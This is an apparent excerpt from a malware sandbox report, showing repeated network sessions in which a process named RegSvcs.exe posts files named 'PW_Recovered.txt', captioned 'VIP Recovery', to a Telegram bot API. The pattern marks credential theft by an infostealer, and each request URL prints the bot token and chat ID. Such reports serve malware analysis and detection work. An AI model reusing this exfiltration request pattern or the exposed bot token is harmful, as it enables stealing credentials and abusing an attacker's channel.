                                                                          2024-09-19 10:22:03 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12750,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          29192.168.2.561534149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:07 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcda09bce7e3ee
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:07 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 61 30 39 62 63 65 37 65 33 65 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcda09bce7e3eeContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:22:07 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:07 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:07 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12751,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          30192.168.2.561535149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:08 UTC345OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcda2a11e28f03
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          2024-09-19 10:22:08 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 61 32 61 31 31 65 32 38 66 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcda2a11e28f03Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:22:09 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:09 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 562
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:09 UTC562INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12752,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          31192.168.2.561538149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:12 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcda2b6f5946f9
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:12 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 61 32 62 36 66 35 39 34 36 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcda2b6f5946f9Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:22:12 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:12 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:12 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12753,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          32192.168.2.561539149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:13 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcda7b752d16fc
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:13 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 61 37 62 37 35 32 64 31 36 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcda7b752d16fcContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:22:13 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:13 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:13 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12754,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          33192.168.2.561542149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:16 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcda4f67f6f17f
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:16 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 61 34 66 36 37 66 36 66 31 37 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcda4f67f6f17fContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:22:16 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:16 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:16 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12755,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          34192.168.2.561544149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:17 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcdab15e90aa9c
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:17 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 61 62 31 35 65 39 30 61 61 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcdab15e90aa9cContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:22:17 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:17 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:17 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12756,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          35192.168.2.561546149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:20 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcda7d977e6e0c
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:20 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 61 37 64 39 37 37 65 36 65 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcda7d977e6e0cContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:22:20 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:20 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
